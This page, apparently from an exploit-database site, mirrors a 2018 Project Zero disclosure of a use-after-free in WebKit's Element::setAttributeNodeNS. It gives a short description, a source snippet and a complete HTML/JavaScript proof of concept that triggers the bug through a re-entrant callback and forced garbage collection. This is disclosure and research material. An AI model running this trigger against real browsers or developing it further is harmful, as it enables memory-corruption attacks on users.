header-logo
Suggest Exploit
vendor:
N/A
by:
Project Zero
7,5
CVSS
HIGH
Use-After-Free
416
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2018

Use-After-Free in Element::setAttributeNodeNS

This vulnerability is a Use-After-Free vulnerability in Element::setAttributeNodeNS. It occurs when setAttributeNodeNS is called again in setAttributeInternal, resulting in two Attr objects with the same owner element and the same name after the first setAttributeNodeNS call. One of the Attr objects will hold the raw pointer of the owner element even if the owner element is freed.

Mitigation:

The best way to mitigate this vulnerability is to ensure that setAttributeNodeNS is not called again in setAttributeInternal.
Source

Exploit-DB raw data:

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1187

Here's a snippet of Element::setAttributeNodeNS.

ExceptionOr<RefPtr<Attr>> Element::setAttributeNodeNS(Attr& attrNode)
{
...
    setAttributeInternal(index, attrNode.qualifiedName(), attrNode.value(), NotInSynchronizationOfLazyAttribute);

    attrNode.attachToElement(*this);
    treeScope().adoptIfNeeded(attrNode);
    ensureAttrNodeListForElement(*this).append(&attrNode);

    return WTFMove(oldAttrNode);
}

|setAttributeInternal| may execute arbitrary JavaScript. If |setAttributeNodeNS| is called again in |setAttributeInternal|, there will be two |Attr| that has the same owner element and the same name after the first |setAttributeNodeNS| call. One of the |Attr|s will hold the raw pointer of the owner element even if the owner element is freed.


PoC:
-->

<body>
<script>

function gc() {
    for (let i = 0; i < 0x40; i++) {
        new ArrayBuffer(0x1000000);
    }
}

window.callback = () => {
    window.callback = null;

    d.setAttributeNodeNS(src);
    f.setAttributeNodeNS(document.createAttribute('src'));
};

let src = document.createAttribute('src');
src.value = 'javascript:parent.callback()';

let d = document.createElement('div');
let f = document.body.appendChild(document.createElement('iframe'));
f.setAttributeNodeNS(src);
f.remove();
f = null;
src = null;

gc();

alert(d.attributes[0].ownerElement);

</script>
</body>

Navigation

Suggest Exploit

Services By CQR